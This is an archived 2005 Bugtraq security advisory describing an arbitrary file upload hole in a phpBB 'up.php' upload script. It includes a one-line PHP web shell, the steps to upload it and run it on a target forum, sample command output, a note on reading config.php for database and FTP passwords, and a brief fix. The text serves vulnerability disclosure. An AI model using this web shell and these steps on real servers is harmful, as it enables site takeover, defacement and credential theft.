phpBB Upload Script "up.php" Arbitrary File Upload

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpBB Upload Script "up.php" Arbitrary File Upload
From: Status-x <phr4xz@xxxxxxxxx>
Date: Thu, 7 Apr 2005 20:21:38 -0600
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=Yr31MWLgUO13Y72kBpzNQtRGTnJDwSS97dxVpYfdEkmnShQhd1K+NGBjADEtY6u1ifZlMZpiUAJ6EcWdRchICWefu6WOSgfst8RIoIuIQTynhpYFfNMvaYwGynf9Anf0fH+KLkc7LXxSSVvgd8ekaHt+s4AqAJ0hc7LVuc3nXPw=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: Status-x <phr4xz@xxxxxxxxx>

#####################################################################

Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"

$ Author: Status-x
$ Contact: phr4xz@xxxxxxxxx - status-x@xxxxxxxxxxxxxx
$ Date: 7 April 2005
$ Website: http://defacers.com.mx
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt
$ Risk: High
$ Vendor URL: http://phpbb.com

$ Affected Software: phpBB 2.0.x

Note: Sorry if it has been posted before

#####################################################################

-= Description =-

phpBB its a forums system written in php which can support images, polls,

private messages and more

http://www.phpbb.com

---------------------------------------------------------------------------

-= Vulnerabilities =-


- | "Arbitrary File Upload" |


In phpBB forums there is an script which can allow to remote and registered

users to upload files with arbitrary content and with any extension.

I didnt found any website where i can download the script so i couldnt

check who made it.



- | Examples: |


We can create and example code to upload it to the "test site"


<?

system($cmd)

?>


And save it as cmd.php. The we enter to:

--------------------------

http://target/phpbb/up.php

--------------------------


And upload our code, to see our file we just enter to:

-----------------------------------

http://targey/phpbb/uploads/cmd.php

-----------------------------------


And we could see that our file has been uploaded:



Warning: system(): Cannot execute a blank command in 
/home/target/public_html/forum/uploads/tetx.php on line 2


The we can execute *NIX commands to obtain extremely compromising info

that could end with the "deface" of the affected site:

-----------------------------------------------------

Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target) 

------------------------------------------------------

This is just an example to what can be done by a malicious attacker.


- | "Password Disclosure" |


The remote or local attacker can also read the config.php file disclosing

the information about the DB and possible the FTP password


------------------------------------------------------

Example

-= How to FIX =-

Just filter the allowed extensions of the uploaded files in the up.php

source.


-= Contact =-

Status-x 

phr4xz@xxxxxxxxx

http://www.defacers.com.mx

Prev by Date: MDKSA-2005:069 - Updated gdk-pixbuf packages fix vulnerability
Next by Date: PunBB <= 1.2.4 - change email to become admin exploit
Previous by thread: MDKSA-2005:069 - Updated gdk-pixbuf packages fix vulnerability
Next by thread: PunBB <= 1.2.4 - change email to become admin exploit
Index(es):
- Date
- Thread